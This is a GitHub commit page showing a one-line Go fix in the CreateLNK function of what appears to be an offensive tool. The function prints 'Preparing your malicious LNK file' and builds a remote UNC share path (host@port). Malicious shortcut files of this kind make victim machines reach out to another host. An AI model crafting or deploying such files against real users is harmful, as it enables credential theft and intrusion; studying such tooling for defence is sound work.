Skip to content

Commit

Permalink
Update Manager.go
Browse files Browse the repository at this point in the history
  • Loading branch information
nickvourd authored Nov 16, 2024
1 parent 033f6e8 commit 443a522
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Packages/Manager/Manager.go
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,7 @@ func CreateLNK(target string, output string, description string, port string, sh

fmt.Printf("[+] Preparing your malicious LNK file...\n\n")

target := "\\\\" + target + "@" + port + "\\" + share
target = "\\\\" + target + "@" + port + "\\" + share

// Record the start time
LNKCreationStartTime := time.Now()
Expand Down

0 comments on commit 443a522

Please sign in to comment.